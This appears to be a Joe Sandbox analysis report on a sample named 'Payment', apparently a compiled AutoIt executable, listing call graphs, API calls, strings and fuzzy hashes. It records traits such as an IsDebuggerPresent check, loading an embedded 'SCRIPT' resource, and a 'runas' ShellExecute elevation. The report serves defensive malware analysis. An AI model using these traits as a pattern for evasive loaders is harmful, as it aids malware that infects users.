af8d68 58 API calls __getptd_noexit 101566->101573 101568 b0547c RtlAllocateHeap 101569 b05462 101568->101569 101568->101570 101569->101556 101570->101568 101570->101569 101574 af35e1 DecodePointer 101570->101574 101572->101560 101573->101569 101574->101570 101575->101497 101576->101498 101577->101487 101578->101506 101579->101510 101580->101518 101582 af9011 101581->101582 101587 af8e99 101582->101587 101586 af902c 101586->101524 101588 af8eb3 _memset ___raise_securityfailure 101587->101588 101589 af8ed3 IsDebuggerPresent 101588->101589 101595 afa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 101589->101595 101591 afc836 __fltout2 6 API calls 101592 af8fba 101591->101592 101594 afa380 GetCurrentProcess TerminateProcess 101592->101594 101593 af8f97 ___raise_securityfailure 101593->101591 101594->101586 101595->101593 101597 afa714 EncodePointer 101596->101597 101597->101597 101598 afa72e 101597->101598 101598->101528 101600 af9e4b __lock 58 API calls 101599->101600 101601 af35b7 DecodePointer EncodePointer 101600->101601 101664 af9fb5 LeaveCriticalSection 101601->101664 101603 ad49a7 101604 af3614 101603->101604 101605 af361e 101604->101605 101606 af3638 101604->101606 101605->101606 101665 af8d68 58 API calls __getptd_noexit 101605->101665 101606->101537 101608 af3628 101666 af8ff6 9 API calls _fprintf 101608->101666 101610 af3633 101610->101537 101611->101539 101613 ad3b59 __write_nolock 101612->101613 101614 ad77c7 59 API calls 101613->101614 101615 ad3b63 GetCurrentDirectoryW 101614->101615 101667 ad3778 101615->101667 101664->101603 101665->101608 101666->101610 101668 ad77c7 59 API calls 101667->101668 101669 ad378e 101668->101669 101879 ad3d43 101669->101879 101671 ad37ac 101672 ad4864 61 API calls 101671->101672 101673 ad37c0 101672->101673 101674 ad7f41 59 API calls 101673->101674 101675 ad37cd 101674->101675 101676 ad4f3d 136 API calls 101675->101676 101677 ad37e6 101676->101677 101678 ad37ee Mailbox 101677->101678 101679 b0d3ae 101677->101679 101683 ad81a7 59 API calls 101678->101683 101921 b397e5 101679->101921 101682 b0d3cd 101685 af2f95 _free 58 API calls 101682->101685 101686 ad3801 101683->101686 101684 ad4faa 84 API calls 101684->101682 101687 b0d3da 101685->101687 101893 ad93ea 101686->101893 101689 ad4faa 84 API calls 101687->101689 101691 b0d3e3 101689->101691 101696 ad3ee2 59 API calls 101691->101696 101692 ad7f41 59 API calls 101693 ad381a 101692->101693 101694 ad8620 69 API calls 101693->101694 101695 ad382c Mailbox 101694->101695 101698 ad7f41 59 API calls 101695->101698 101697 b0d3fe 101696->101697 101699 ad3ee2 59 API calls 101697->101699 101700 ad3852 101698->101700 101701 b0d41a 101699->101701 101702 ad8620 69 API calls 101700->101702 101703 ad4864 61 API calls 101701->101703 101705 ad3861 Mailbox 101702->101705 101704 b0d43f 101703->101704 101706 ad3ee2 59 API calls 101704->101706 101708 ad77c7 59 API calls 101705->101708 101707 b0d44b 101706->101707 101709 ad81a7 59 API calls 101707->101709 101710 ad387f 101708->101710 101711 b0d459 101709->101711 101896 ad3ee2 101710->101896 101713 ad3ee2 59 API calls 101711->101713 101715 b0d468 101713->101715 101721 ad81a7 59 API calls 101715->101721 101717 ad3899 101717->101691 101718 ad38a3 101717->101718 101880 ad3d50 __write_nolock 101879->101880 101881 ad7d2c 59 API calls 101880->101881 101887 ad3eb6 Mailbox 101880->101887 101883 ad3d82 101881->101883 101882 ad7b52 59 API calls 101882->101883 101883->101882 101892 ad3db8 Mailbox 101883->101892 101884 ad7b52 59 API calls 101884->101892 101885 ad3e89 101886 ad7f41 59 API calls 101885->101886 101885->101887 101889 ad3eaa 101886->101889 101887->101671 101888 ad7f41 59 API calls 101888->101892 101890 ad3f84 59 API calls 101889->101890 101890->101887 101891 ad3f84 59 API calls 101891->101892 101892->101884 101892->101885 101892->101887 101892->101888 101892->101891 101894 af0ff6 Mailbox 59 API calls 101893->101894 101895 ad380d 101894->101895 101895->101692 101897 ad3eec 101896->101897 101898 ad3f05 101896->101898 101899 ad81a7 59 API calls 101897->101899 101900 ad7d2c 59 API calls 101898->101900 101901 ad388b 101899->101901 101900->101901 101902 af313d 101901->101902 101903 af31be 101902->101903 101904 af3149 101902->101904 101958 af31d0 60 API calls 3 library calls 101903->101958 101911 af316e 101904->101911 101956 af8d68 58 API calls __getptd_noexit 101904->101956 101906 af31cb 101906->101717 101908 af3155 101957 af8ff6 9 API calls _fprintf 101908->101957 101911->101717 101922 ad5045 85 API calls 101921->101922 101923 b39854 101922->101923 101924 b399be 96 API calls 101923->101924 101925 b39866 101924->101925 101926 ad506b 74 API calls 101925->101926 101952 b0d3c1 101925->101952 101927 b39881 101926->101927 101928 ad506b 74 API calls 101927->101928 101929 b39891 101928->101929 101930 ad506b 74 API calls 101929->101930 101931 b398ac 101930->101931 101932 ad506b 74 API calls 101931->101932 101933 b398c7 101932->101933 101934 ad5045 85 API calls 101933->101934 101935 b398de 101934->101935 101936 af594c __crtGetStringTypeA_stat 58 API calls 101935->101936 101937 b398e5 101936->101937 101938 af594c __crtGetStringTypeA_stat 58 API calls 101937->101938 101939 b398ef 101938->101939 101940 ad506b 74 API calls 101939->101940 101941 b39903 101940->101941 101942 b39393 GetSystemTimeAsFileTime 101941->101942 101943 b39916 101942->101943 101945 b3992b 101943->101945 101952->101682 101952->101684 101956->101908 101958->101906 102259 ad3633 102260 ad366a 102259->102260 102261 ad3688 102260->102261 102262 ad36e7 102260->102262 102300 ad36e5 102260->102300 102263 ad375d PostQuitMessage 102261->102263 102264 ad3695 102261->102264 102266 ad36ed 102262->102266 102267 b0d31c 102262->102267 102273 ad36d8 102263->102273 102270 ad36a0 102264->102270 102271 b0d38f 102264->102271 102265 ad36ca DefWindowProcW 102265->102273 102268 ad3715 SetTimer RegisterWindowMessageW 102266->102268 102269 ad36f2 102266->102269 102309 ae11d0 10 API calls Mailbox 102267->102309 102268->102273 102276 ad373e CreatePopupMenu 102268->102276 102274 ad36f9 KillTimer 102269->102274 102275 b0d2bf 102269->102275 102277 ad36a8 102270->102277 102278 ad3767 102270->102278 102313 b32a16 71 API calls _memset 102271->102313 102304 ad44cb Shell_NotifyIconW _memset 102274->102304 102281 b0d2c4 102275->102281 102282 b0d2f8 MoveWindow 102275->102282 102276->102273 102284 b0d374 102277->102284 102285 ad36b3 102277->102285 102307 ad4531 64 API calls _memset 102278->102307 102280 b0d343 102310 ae11f3 331 API calls Mailbox 102280->102310 102289 b0d2e7 SetFocus 102281->102289 102290 b0d2c8 102281->102290 102282->102273 102284->102265 102312 b2817e 59 API calls Mailbox 102284->102312 102292 ad36be 102285->102292 102293 ad374b 102285->102293 102286 b0d3a1 102286->102265 102286->102273 102289->102273 102290->102292 102295 b0d2d1 102290->102295 102291 ad370c 102305 ad3114 DeleteObject DestroyWindow Mailbox 102291->102305 102292->102265 102311 ad44cb Shell_NotifyIconW _memset 102292->102311 102306 ad45df 81 API calls _memset 102293->102306 102294 ad375b 102294->102273 102308 ae11d0 10 API calls Mailbox 102295->102308 102300->102265 102302 b0d368 102303 ad43db 68 API calls 102302->102303 102303->102300 102304->102291 102305->102273 102306->102294 102307->102294 102308->102273 102309->102280 102310->102292 102311->102302 102312->102300 102313->102286

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AD3B7A
                                                          • IsDebuggerPresent.KERNEL32 ref: 00AD3B8C
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00B962F8,00B962E0,?,?), ref: 00AD3BFD
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                            • Part of subcall function 00AE0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AD3C26,00B962F8,?,?,?), ref: 00AE0ACE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD3C81
                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B893F0,00000010), ref: 00B0D4BC
                                                          • SetCurrentDirectoryW.KERNEL32(?,00B962F8,?,?,?), ref: 00B0D4F4
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B85D40,00B962F8,?,?,?), ref: 00B0D57A
                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B0D581
                                                            • Part of subcall function 00AD3A58: GetSysColorBrush.USER32(0000000F), ref: 00AD3A62
                                                            • Part of subcall function 00AD3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00AD3A71
                                                            • Part of subcall function 00AD3A58: LoadIconW.USER32(00000063), ref: 00AD3A88
                                                            • Part of subcall function 00AD3A58: LoadIconW.USER32(000000A4), ref: 00AD3A9A
                                                            • Part of subcall function 00AD3A58: LoadIconW.USER32(000000A2), ref: 00AD3AAC
                                                            • Part of subcall function 00AD3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AD3AD2
                                                            • Part of subcall function 00AD3A58: RegisterClassExW.USER32(?), ref: 00AD3B28
                                                            • Part of subcall function 00AD39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AD3A15
                                                            • Part of subcall function 00AD39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AD3A36
                                                            • Part of subcall function 00AD39E7: ShowWindow.USER32(00000000,?,?), ref: 00AD3A4A
                                                            • Part of subcall function 00AD39E7: ShowWindow.USER32(00000000,?,?), ref: 00AD3A53
                                                            • Part of subcall function 00AD43DB: _memset.LIBCMT ref: 00AD4401
                                                            • Part of subcall function 00AD43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AD44A6
                                                          Strings
                                                          • runas, xrefs: 00B0D575
                                                          • This is a third-party compiled AutoIt script., xrefs: 00B0D4B4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                          • API String ID: 529118366-3287110873
                                                          • Opcode ID: d28e1a5f11c00f0e4b020980b95c413c4015d28fc610a97bf5c0d0c9dd33948c
                                                          • Instruction ID: 0f32bd4f0d88088856cf6fea4d5ba72572b7bc86c9c41dd94d24fc2b2da89aa4
                                                          • Opcode Fuzzy Hash: d28e1a5f11c00f0e4b020980b95c413c4015d28fc610a97bf5c0d0c9dd33948c
                                                          • Instruction Fuzzy Hash: 1F51C571A14249AACF15ABB4DE05EFE7BB8AF04340F0441F7F452673A2DE705A45CB21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 996 ad4afe-ad4b5e call ad77c7 GetVersionExW call ad7d2c 1001 ad4c69-ad4c6b 996->1001 1002 ad4b64 996->1002 1003 b0db90-b0db9c 1001->1003 1004 ad4b67-ad4b6c 1002->1004 1005 b0db9d-b0dba1 1003->1005 1006 ad4c70-ad4c71 1004->1006 1007 ad4b72 1004->1007 1009 b0dba3 1005->1009 1010 b0dba4-b0dbb0 1005->1010 1008 ad4b73-ad4baa call ad7e8c call ad7886 1006->1008 1007->1008 1018 b0dc8d-b0dc90 1008->1018 1019 ad4bb0-ad4bb1 1008->1019 1009->1010 1010->1005 1012 b0dbb2-b0dbb7 1010->1012 1012->1004 1014 b0dbbd-b0dbc4 1012->1014 1014->1003 1016 b0dbc6 1014->1016 1020 b0dbcb-b0dbce 1016->1020 1021 b0dc92 1018->1021 1022 b0dca9-b0dcad 1018->1022 1019->1020 1023 ad4bb7-ad4bc2 1019->1023 1024 b0dbd4-b0dbf2 1020->1024 1025 ad4bf1-ad4c08 GetCurrentProcess IsWow64Process 1020->1025 1030 b0dc95 1021->1030 1026 b0dc98-b0dca1 1022->1026 1027 b0dcaf-b0dcb8 1022->1027 1031 b0dc13-b0dc19 1023->1031 1032 ad4bc8-ad4bca 1023->1032 1024->1025 1033 b0dbf8-b0dbfe 1024->1033 1028 ad4c0d-ad4c1e 1025->1028 1029 ad4c0a 1025->1029 1026->1022 1027->1030 1036 b0dcba-b0dcbd 1027->1036 1037 ad4c89-ad4c93 GetSystemInfo 1028->1037 1038 ad4c20-ad4c30 call ad4c95 1028->1038 1029->1028 1030->1026 1034 b0dc23-b0dc29 1031->1034 1035 b0dc1b-b0dc1e 1031->1035 1039 ad4bd0-ad4bd3 1032->1039 1040 b0dc2e-b0dc3a 1032->1040 1041 b0dc00-b0dc03 1033->1041 1042 b0dc08-b0dc0e 1033->1042 1034->1025 1035->1025 1036->1026 1045 ad4c56-ad4c66 1037->1045 1053 ad4c7d-ad4c87 GetSystemInfo 1038->1053 1054 ad4c32-ad4c3f call ad4c95 1038->1054 1043 ad4bd9-ad4be8 1039->1043 1044 b0dc5a-b0dc5d 1039->1044 1046 b0dc44-b0dc4a 1040->1046 1047 b0dc3c-b0dc3f 1040->1047 1041->1025 1042->1025 1049 ad4bee 1043->1049 1050 b0dc4f-b0dc55 1043->1050 1044->1025 1052 b0dc63-b0dc78 1044->1052 1046->1025 1047->1025 1049->1025 1050->1025 1055 b0dc82-b0dc88 1052->1055 1056 b0dc7a-b0dc7d 1052->1056 1057 ad4c47-ad4c4b 1053->1057 1061 ad4c76-ad4c7b 1054->1061 1062 ad4c41-ad4c45 GetNativeSystemInfo 1054->1062 1055->1025 1056->1025 1057->1045 1060 ad4c4d-ad4c50 FreeLibrary 1057->1060 1060->1045 1061->1062 1062->1057
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00AD4B2B
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                          • GetCurrentProcess.KERNEL32(?,00B5FAEC,00000000,00000000,?), ref: 00AD4BF8
                                                          • IsWow64Process.KERNEL32(00000000), ref: 00AD4BFF
                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00AD4C45
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00AD4C50
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00AD4C81
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00AD4C8D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 1986165174-0
                                                          • Opcode ID: e2e998f6b1c1407da0a5556b0e5f2c80855d3c147fe6fea1361a9b7fba107535
                                                          • Instruction ID: 25084c6936fcfb7a3c84e9c08b50d998d16d95d739125c450aa1424246dcbf58
                                                          • Opcode Fuzzy Hash: e2e998f6b1c1407da0a5556b0e5f2c80855d3c147fe6fea1361a9b7fba107535
                                                          • Instruction Fuzzy Hash: A091A03154ABC0DAD731DB6885516AAFFF4AF3A300B48499FE0CB93B81D631A948D719
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1063 ad4fe9-ad5001 CreateStreamOnHGlobal 1064 ad5021-ad5026 1063->1064 1065 ad5003-ad501a FindResourceExW 1063->1065 1066 b0dd5c-b0dd6b LoadResource 1065->1066 1067 ad5020 1065->1067 1066->1067 1068 b0dd71-b0dd7f SizeofResource 1066->1068 1067->1064 1068->1067 1069 b0dd85-b0dd90 LockResource 1068->1069 1069->1067 1070 b0dd96-b0ddb4 1069->1070 1070->1067
                                                          APIs
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AD4EEE,?,?,00000000,00000000), ref: 00AD4FF9
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AD4EEE,?,?,00000000,00000000), ref: 00AD5010
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00AD4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AD4F8F), ref: 00B0DD60
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00AD4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AD4F8F), ref: 00B0DD75
                                                          • LockResource.KERNEL32(00AD4EEE,?,?,00AD4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AD4F8F,00000000), ref: 00B0DD88
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: 85c194dac1a083c7c56dc82dddd3cb8d89692f3f9f14c4b5a16070fbaed0d227
                                                          • Instruction ID: 19080c8ab46d828b5a2b73ff9851829b521c45e98df87ecee639a4d15f562764
                                                          • Opcode Fuzzy Hash: 85c194dac1a083c7c56dc82dddd3cb8d89692f3f9f14c4b5a16070fbaed0d227
                                                          • Instruction Fuzzy Hash: 1D115AB5600701BFD7218B65DC58F67BBB9FBC9B12F2081A9F406872A0DB62E8008661
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00B0E7C1), ref: 00B346A6
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00B346B7
                                                          • FindClose.KERNEL32(00000000), ref: 00B346C7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: c7d823e433fb0e7fe42f03ce8bdee04e1fec383bc5e446d4d403661b92832787
                                                          • Instruction ID: b85237bdf07f51e8345c29fcbdff62bafb6766830846d94feefa6ca87f4f0bf0
                                                          • Opcode Fuzzy Hash: c7d823e433fb0e7fe42f03ce8bdee04e1fec383bc5e446d4d403661b92832787
                                                          • Instruction Fuzzy Hash: FFE0D8314105015B52106B38EC4E4FAB79CDE07336F2007D5F935C30F0EBB06D54959A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • Variable must be of type 'Object'., xrefs: 00B1428C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Variable must be of type 'Object'.
                                                          • API String ID: 0-109567571
                                                          • Opcode ID: 1150e97114417e800d04d02638ec796fe1389438f61904f87367de721cad58bb
                                                          • Instruction ID: d47196577ff9e5d297921aed7b3f3cdd5b6921db73f3184a0348c69bcfbb60a0
                                                          • Opcode Fuzzy Hash: 1150e97114417e800d04d02638ec796fe1389438f61904f87367de721cad58bb
                                                          • Instruction Fuzzy Hash: 9FA25A74A04215DFCB24DF58C580AAEB7F2FB48304F64816AE917AB351DB35AD82CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AE0BBB
                                                          • timeGetTime.WINMM ref: 00AE0E76
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AE0FB3
                                                          • TranslateMessage.USER32(?), ref: 00AE0FC7
                                                          • DispatchMessageW.USER32(?), ref: 00AE0FD5
                                                          • Sleep.KERNEL32(0000000A), ref: 00AE0FDF
                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00AE105A
                                                          • DestroyWindow.USER32 ref: 00AE1066
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AE1080
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00B152AD
                                                          • TranslateMessage.USER32(?), ref: 00B1608A
                                                          • DispatchMessageW.USER32(?), ref: 00B16098
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B160AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                          • API String ID: 4003667617-3242690629
                                                          • Opcode ID: c0ce6a030ee33a529a26f3b1670cec7640fa6130cffbb1fb292667901f75d33d
                                                          • Instruction ID: 299d3e25b5df6c66eb6c60de6b8c408682b566e0b97dfb6f3e68e22053ea9241
                                                          • Opcode Fuzzy Hash: c0ce6a030ee33a529a26f3b1670cec7640fa6130cffbb1fb292667901f75d33d
                                                          • Instruction Fuzzy Hash: 0BB2B070608741DFD734DF24C984BAAB7E5FF84304F5449AEE49A972A1DB74E884CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00B391E9: __time64.LIBCMT ref: 00B391F3
                                                            • Part of subcall function 00AD5045: _fseek.LIBCMT ref: 00AD505D
                                                          • __wsplitpath.LIBCMT ref: 00B394BE
                                                            • Part of subcall function 00AF432E: __wsplitpath_helper.LIBCMT ref: 00AF436E
                                                          • _wcscpy.LIBCMT ref: 00B394D1
                                                          • _wcscat.LIBCMT ref: 00B394E4
                                                          • __wsplitpath.LIBCMT ref: 00B39509
                                                          • _wcscat.LIBCMT ref: 00B3951F
                                                          • _wcscat.LIBCMT ref: 00B39532
                                                            • Part of subcall function 00B3922F: _memmove.LIBCMT ref: 00B39268
                                                            • Part of subcall function 00B3922F: _memmove.LIBCMT ref: 00B39277
                                                          • _wcscmp.LIBCMT ref: 00B39479
                                                            • Part of subcall function 00B399BE: _wcscmp.LIBCMT ref: 00B39AAE
                                                            • Part of subcall function 00B399BE: _wcscmp.LIBCMT ref: 00B39AC1
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B396DC
                                                          • _wcsncpy.LIBCMT ref: 00B3974F
                                                          • DeleteFileW.KERNEL32(?,?), ref: 00B39785
                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B3979B
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B397AC
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B397BE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: 57612104f801b8eba023aa07595b68199584c3fb468929715586608f8be85d06
                                                          • Instruction ID: d33fab5f052f33f9e1ff1be4f75a911047a373356c82c7d55a9b0104a8844f82
                                                          • Opcode Fuzzy Hash: 57612104f801b8eba023aa07595b68199584c3fb468929715586608f8be85d06
                                                          • Instruction Fuzzy Hash: 24C11AB1D00219AFDF21DFA4CD85AEEB7BDEF54300F1040AAF609E6251DB709A848F65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AD3074
                                                          • RegisterClassExW.USER32(00000030), ref: 00AD309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AD30AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00AD30CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AD30DC
                                                          • LoadIconW.USER32(000000A9), ref: 00AD30F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AD3101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
